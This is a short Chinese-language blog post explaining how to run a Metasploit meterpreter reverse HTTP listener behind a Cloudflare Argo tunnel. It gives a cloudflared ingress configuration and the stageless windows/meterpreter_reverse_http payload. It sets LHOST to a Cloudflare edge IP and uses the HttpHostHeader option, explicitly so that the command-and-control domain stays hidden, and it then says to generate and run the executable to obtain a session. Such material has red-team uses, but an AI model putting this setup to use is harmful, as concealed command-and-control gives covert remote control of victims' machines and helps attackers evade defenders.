msf http使用cloudflare argo上线

为了直观展示，本文使用VIPER图形化界面。

配置Argo隧道方法

下面教程是建立在您已经有一条隧道，有一个配置文件的基础上的，如果您还没有，请参阅使用Cloudflare Argo隐藏VIPER后台。

在config.yml后面添上
如果已经有了那路径是/etc/cloudflared/config.yml。

新加如下几行

#tp
tunnel: xxxxxxxxx
credentials-file: /root/.cloudflared/xxxxxxxxx.json

ingress:
  - hostname: vip.example.top
    service: http://127.0.0.1:60000
    #这里开始
  - hostname: tp.example.top
    service: http://127.0.0.1:2095 #这里端口要和下面msf监听设置成一样的，只要没被占用就行
    #这里结束
  - service: http_status:404

最后重启服务，应用配置文件。

1	`sudo systemctl restart cloudflared`

在cloudflare dashboard的dns面板里面，将tp.example.top的记录设置为与vip.example.top的记录一样
就像这样

然后通过浏览器访问http://tp.example.top:2095，应该会有这样的提示。
提示404 Not found

通过http上线

因为cloudflare在国内访问不太行，最好用stageless。

载荷选择windows/meterpreter_reverse_http。

设置LHOST为tp.example.top
端口和argo隧道里设的一样就行。

设置LHOST为104.19.0.100，这是Cloudflare的一个香港节点，大陆访问速度相当快，如果你有更快的就直接替代好啦。
下拉找到HttpHostHeader，里面填tp.example.top这样既可以用较快的节点访问C2服务器，又不至于太暴露C2域名。

如果用HostHeader伪装C2域名，理论上来讲没问题，但是实操会导致上线但无法操作，可能跟缓存有关，下周回来试试。

设置完之后大概这样

生成PE/ELF文件，然后执行。就会产生一个Session。

最终成果

#Linux #cloudflare #Argo #metasploit #网络安全

msf http使用cloudflare argo上线

https://tokisaki.top/blog/meterpreter-via-cloudflare-argo/

作者

Tokisaki Galaxy

发布于

2021年11月21日

许可协议

解决WSA或WSL占用过多C盘空间上一篇

使用Cloudflare Argo隐藏VIPER后台下一篇